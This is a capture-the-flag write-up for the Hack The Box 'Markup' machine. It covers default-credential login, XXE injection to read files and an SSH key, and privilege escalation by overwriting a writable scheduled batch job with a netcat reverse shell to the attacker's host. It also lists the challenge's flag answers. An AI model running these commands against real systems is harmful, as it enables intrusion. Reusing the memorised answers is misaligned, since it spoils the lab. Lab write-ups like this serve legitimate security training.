Markup (Tier 2)

Description

  • Tier -> 2

  • Difficult -> Very Easy

  • OS -> Windows

  • Tags -> Apache / SSH / PHP / Reconnaissance / Scheduled Job Abuse / Weak Credentials / Arbitrary File Upload / XXE Injection / Weak Permissions

https://app.hackthebox.com/starting-point?tier=2

Write-up

  • I started doing an initial scan with Nmap

nmap 10.129.136.233 -p- -Pn --min-rate 2500 -oN scan.txt

  • Then to learn more about the services running on the open ports found, I did an exhaustive scan

nmap 10.129.136.233 -p22,80,443 -sVC -oN serv_scan.txt
snippet

  • With this, I answered the first question

Answer: 2.4.41

  • I found the HTTP service running on port 80 so I went to the browser to explore the content and found a login page. I tried logging in with common credentials and fortunately using the combination of username admin and password password I got in successfully to a new dashboard

To learn more about the HTTP protocol you can go here

  • With this, I answered the next question

Answer: admin:password

  • Then I explored the tabs of the website where in the Contact tab I found an email and a form for submission. Unfortunately, the form didn't work, so we went to the Order tab which also had a form. After filling out that one and clicking on the Submit button, it worked giving me a pop-up informing the request had been sent

  • So to check how the request was being sent, I used Foxyproxy and Burpsuite to intercept the petition. I noticed a session cookie from PHP and what caught my attention, was the fact the site was sending the information using XML

  • With this and a little research, I answered the next questions

Answer: order

Answer: 1.0

Answer: XML External Entity

  • To retrieve more information about this section, I checked the source code finding a commentary from one of the developers with its name, possibly being a user of the system. So as I didn't find anything else interesting, I could use this information to modify the XML of the petition

snippet

  • With this, I answered the next question

Answer: Daniel

  • I tried making a test for a possible XEE Injection and it worked successfully, being able to retrieve the content of the /etc/hosts Windows file. With this and the previous information found, I tried accessing the Desktop folder for the user Daniel and reading the user.txt file which usually contains the user flag, and it worked

To learn more about XXE Injection you can go here.

  • So, I continued retrieving possible files that could help to gain access to the system as one of the users. Checking for configurations of the SSH protocol for Daniel, I found a file with the default name id_rsa being this the private key for the user. So I used this to connect through SSH to the system as the Daniel user and it worked

ssh Daniel@10.129.136.233 -i ssh_key

To learn more about the SSH protocol you can go here

  • Once inside I tried accessing a PowerShell and the system let me do it without any issue. Then I checked for the privileges of the user but didn't find anything relevant, so I continued exploring the system for a possible way to escalate privileges

  • Exploring the root folder C:\ I found a particular folder named Log-Management which is not a standard system file for Windows. So I accessed it and listed its content finding a job.bat file, and checking at that, I saw it was a script that seemed to be a programmed task that was interacting with an executable named wevtutil.exe. Also, the script said that it could only be run with administrator permissions, letting us know it was being called with privileges

  • With this and the previously found user flag, I answered the next questions

Answer: job.bat

Answer: wevtutil.exe

Answer: 032d2fc8952a8c24e39c8f0ee9918ef7

  • So I searched about the functioning of this program, understanding that it was being called through the job to erase the logs of the system every so often. With this, I could check if the service was still running on the system and which permission it had, maybe letting us modify its content. So I checked noticing it has full-control permissions for all the local users. Then I checked the current system processes and found the system was still using the program

icacls job.bat
ps
snippet
snippet

  • Knowing this I could modify the content to possibly execute arbitrary programs or commands. So I tried using this to gain a Reverse Shell using a Netcat executable, first downloading the corresponding file to our machine and importing it to the target machine

# In our machine
wget https://github.com/int0x33/nc.exe/blob/master/nc64.exe #Get NC executable
python3 -m http.server 1234 #On the folder where we have the executable

# In the target machine
wget http://10.10.14.117:1234/nc64.exe -outfile nc64.exe

To learn the details about the abuse of .bat files for privileges escalation you can go here

  • Then I set up a listener in my machine to receive the connection and pass the payload to execute Netcat to the job file. The PowerShell gave me an error so I tried closing it and doing it from the CMD, this time working properly and checking the content of the file had been modified successfully. Then I waited for the script to be executed by the system and after a while, the listener caught the shell as the Administrator user

# In our machine
nc -nvlp 4444

# In the target machine
echo C:\Log-Management\nc64.exe -e cmd.exe 10.10.14.117 4444 > C:\Log-Management\job.bat

  • Finally, I went to the Desktop folder of the Administrator user, listing its content and noticing a root.txt file, which after reading it, gave me the root flag

  • With this, I got the root flag and pwned the machine

Answer: f574a3e7650cebd8c39784299cb570f8

PreviousIncluded (Tier 2)NextBase (Tier 2)

Last updated